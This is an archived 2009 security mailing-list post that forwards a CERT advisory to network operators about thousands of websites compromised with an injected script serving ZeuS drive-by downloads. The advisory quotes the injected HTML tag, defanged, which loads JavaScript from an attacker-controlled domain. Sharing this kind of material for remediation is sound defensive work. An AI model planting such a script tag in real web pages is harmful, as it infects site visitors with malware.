[nsp-sec] ACK 3303, 29222 compromised websites (ZeuS drive-by downloads)
Jan Boogman
boogman at ip-plus.net
Tue Apr 28 02:52:02 EDT 2009
ACK 3303, 29222
Jan
Am 27.04.2009 um 18:02 schrieb Dirk Stander:
> ----------- nsp-security Confidential --------
>
> .: Hi,
>
> I'm sending this by courtesy of Thomas Hungenberg (CERT_BUND / BSI).
>
> Regards Dirk Stander (1&1) :.
>
> =====================================================================
>
> Hi teams,
>
> there was a malicious javascript at <hXXp://crew.abnc-portal.com/show.js
> >.
> A reference to this URL has been injected into thousands of
> compromised websites
> like this (remove XXX) - usually before the closing BODY tag:
>
> <!-- ad --><scrXXXipt language=javascript src="hXXp://crew.abnc-
> portal.com/show.js"></scrXXXipt><!-- /ad -->
>
> For an unknown reason, the IP address for crew.abnc-portal.com was
> changed
> to 88.80.216.114 by the attackers(?) some days ago.
>
> 88.80.216.114 is hosting the Swiss security blog 'abuse.ch'.
> This server is not malicious and has not been compromised!
>
> By analyzing the Referer headers from the requests for /show.js that
> hit 88.80.216.114,
> we were able to identify compromised websites that have the above
> mentioned javascript
> injected into one or more pages.
>
> Please find attached a list of ~10.000 compromised websites that
> showed up in the Referers.
>
> =====================================================================
> <showjs_referer_asn.txt>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet
> security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list